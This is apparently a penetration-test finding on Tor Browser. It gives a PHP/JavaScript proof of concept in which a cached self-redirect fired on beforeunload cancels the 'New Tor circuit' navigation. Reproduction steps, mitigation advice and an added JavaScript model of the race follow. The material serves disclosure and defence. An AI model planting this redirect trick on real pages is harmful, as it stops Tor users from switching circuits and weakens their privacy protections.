TTP-02-002 WP1: Redirect prevents switching to new Tor Circuit (Info)
Description:
It was discovered that the navigation initiated through the new Tor Circuit feature can be hijacked. This can be accomplished by redirecting the current website to a cached page immediately after the Tor Circuit switch starts. As a result, the attacker-initiated navigation occurs before the browser-initiated navigation of the circuit switch, and the latter is canceled.
An attacker could exploit this vulnerability to prevent users from switching circuits while browsing a malicious webpage. Although this prevents the user from changing their Tor Circuit, it was concluded that this does not pose any immediate security risk, and as such, the severity mark was appropriately set at Info.
PoC:
<?php
// Make the response cacheable for a week so that the self-redirect below
// is served from the browser cache and completes immediately.
header("cache-control: max-age=604800");
header("Age: 100");
?>
<html>
<script>
let status = false;
// beforeunload fires when the circuit-switch navigation starts.
onbeforeunload = () => { status = true; };
let timer = setInterval(() => {
  if (status) {
    status = false;
    clearInterval(timer);
    // Navigate to the cached copy of this page, racing the pending navigation.
    location.href = location.href;
  }
}, 1);
</script>
</html>
Steps to reproduce:
- Open the Tor Browser and connect to the Tor network.
- Save the PoC above as a PHP file and serve it through a PHP server.
- Access the file a few times through the Tor Browser to make sure it gets cached by the browser.
- Click on the Tor Circuit button and then on the "New Tor circuit for this site" option.
- The page will quickly be reloaded but the Circuit will remain the same.
To mitigate this issue, Cure53 advises forcing the navigation initiated by the new Tor Circuit feature to be completed. Cancellation of a user-initiated navigation is ill-advised in this scenario. However, during the testing phase, the team was unable to pinpoint the specific code responsible for this issue. As a result, the mitigation advice provided is currently incomplete.
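The race described above, and the effect of the recommended mitigation, can be modelled in a few lines. This is an added illustration, not Tor Browser or Firefox code; the NavigationModel class, its method names and the placeholder URL are all constructed for the model.

```javascript
// Added example: a small model of a browser arbitrating two competing
// navigations, written to illustrate the finding above. It is not Tor
// Browser or Firefox code; every name in it is constructed for the model.
class NavigationModel {
  constructor({ protectUserInitiated }) {
    this.protectUserInitiated = protectUserInitiated; // the proposed fix
    this.pending = null;  // navigation currently in flight
    this.handlers = [];   // the page's onbeforeunload handlers
    this.log = [];
  }
  onBeforeUnload(fn) { this.handlers.push(fn); }
  // userInitiated is true for "New Tor circuit for this site" and false
  // for a location.href assignment made by page script.
  navigate(url, { userInitiated, fromCache = false }) {
    if (this.pending) {
      // Hardened: page script cannot cancel an in-flight user navigation.
      if (this.protectUserInitiated && this.pending.userInitiated && !userInitiated) {
        this.log.push(`ignored script navigation to ${url}`);
        return false;
      }
      // Vulnerable: the most recent navigation cancels the pending one.
      this.log.push(`cancelled pending navigation to ${this.pending.url}`);
    }
    this.pending = { url, userInitiated, fromCache };
    this.log.push(`started ${url} (user=${userInitiated}, cache=${fromCache})`);
    for (const fn of this.handlers) fn(); // page receives beforeunload
    return true;
  }
  // Whatever is still pending commits; a cached copy commits immediately.
  commit() { const done = this.pending; this.pending = null; return done; }
}

// Replays the PoC against the model: beforeunload arms a self-redirect to
// the cached copy of the page, which races the circuit-switch reload.
// (The PoC fires the redirect from a 1 ms timer; the model collapses that.)
function runScenario(protectUserInitiated) {
  const page = 'http://constructed.example/poc.php'; // placeholder URL
  const nav = new NavigationModel({ protectUserInitiated });
  let armed = true; // mirrors the PoC's `status` flag: redirect only once
  nav.onBeforeUnload(() => {
    if (!armed) return;
    armed = false;
    nav.navigate(page, { userInitiated: false, fromCache: true });
  });
  nav.navigate(page, { userInitiated: true }); // "New Tor circuit for this site"
  return { committed: nav.commit(), log: nav.log };
}
```

With protectUserInitiated set to false the cached self-redirect is what commits, matching the observed behaviour; with it set to true the user-initiated navigation survives and the script's redirect is ignored.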